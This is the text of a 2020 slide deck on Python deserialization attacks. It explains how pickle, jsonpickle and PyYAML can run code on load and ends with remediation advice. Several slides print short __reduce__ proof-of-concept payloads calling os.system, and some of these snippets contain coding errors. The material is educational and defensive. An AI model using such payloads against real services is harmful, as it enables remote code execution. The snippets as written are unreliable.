Learn how Deserialization tends to vulnerability and which python modules are vulnerable to deserialization attacks.

1. Python Deserialization Attacks
By Manmeet Singh
Date - 28/04/2020

2. Contents
● Serialization Concept
● Why Deserialization tends to a vulnerability ?
● Python Modules vulnerable to Deserialization Vuln.
● Pickle Module
● JSONPickle Module
● PyYAML Module
● Remediation

3. Serialization Concept

4. Structured Data
Variables
Lists
Strings
Custom Objects
Text
Readable or
Unreadable (Bytes)
stream format

5. Why we need serialization?
1. Recovery of original Structure.
2. Minimize the bandwidth.
3. Calling of class objects.

6. ● Thick client application and
desktop programs. Example :
metasploit, Pycharm, Intellij
IDEA etc.
● APIs.
● Mobile applications
Where is Serialization getting used ?

7. Why Deserialization
tends to a vulnerability
?

8. Objects of classes can be
serialized…
And when they get
deserialized, the class
objects are reformed and do
it purpose.

9. Yes, Calling of any existing
class method is possible ..
Even os.system()

10. Do developer of serialization libraries
knew this?

11. Why it was made then?
Application
Class A
Class B
def abc():
...
Dynamically working with classes

12. Python Serialization Modules
Vulnerable To Deserialization
Vulnerability

13. ● Pickle
● jsonpickle
● Pyyaml
● ruamel.yaml

14. Pickle Module

15. Pickling is a way to convert a python object (list, dict, etc.) into a
character stream. The idea is that this character stream contains all the
information necessary to reconstruct the object in another python script.

16. Serialization using pickle - pickle.dumps(Object)
Deserialization using pickle - pickle.loads(stream)
How to pickle and de-pickle ?

17. Byte stream ending with . (dot)
Detecting use of pickle module

18. from pickle import dumps
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dumps(payload()))
How to exploit pickle deserialization ?

19. from pickle import loads
loads(stream)
How to exploit pickle deserialization ?

20. JSONPickle Module

21. jsonpickle will serialize complex Python objects to and from JSON.It also
convert a pickled object into human readable form.

22. Serialization using jsonpickle - jsonpickle.encode(Object)
Deserialization using jsonpickle - jsonpickle.decode(stream)
How to jsonpickle and json de-pickle ?

23. It looks like normal JSON stream of data. Sometimes have a tag “py/” in it.
Detecting use of jsonpickle module

24. from jsonpickle import encode
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(decode(payload()))
How to exploit jsonpickle deserialization ?

25. from jsonpickle import decode
decode(stream)
How to exploit jsonpickle deserialization ?

26. PyYAML Module

27. Pyyaml python module is used to serialize objects in YAML (Yet Another
Markup Language) format. So this module is used to process YAML data.
● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342)
● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain
condition. (CVE-2019-20477)
● Latest version 5.3.1 of Pyyaml is not vulnerable.

28. Serialization using pyyaml - yaml.dump(Object)
Deserialization using pyyaml - yaml.load(stream)
How to YAML serialize and deserialize ?

29. It will be in a YAML format.
Detecting use of pyyaml/ruamel.yaml modules

30. from yaml import dump
import os
class payload(objects):
def __reduce__(self):
return os.system, (“dir”,)
print(dump(payload()))
How to exploit pyyaml deserialization ?

31. from yaml import load
load(stream)
How to exploit pyyaml deserialization ?

32. Remediations
For jsonpickle and pickle,
Here, the general take-away would be the rule of thumb “Do not deserialize untrusted
data”
For Pyyaml,
● Use safe_dump() and safe_load() instead of dump() and load().
● Use latest version of pyyaml.

33. Questions ?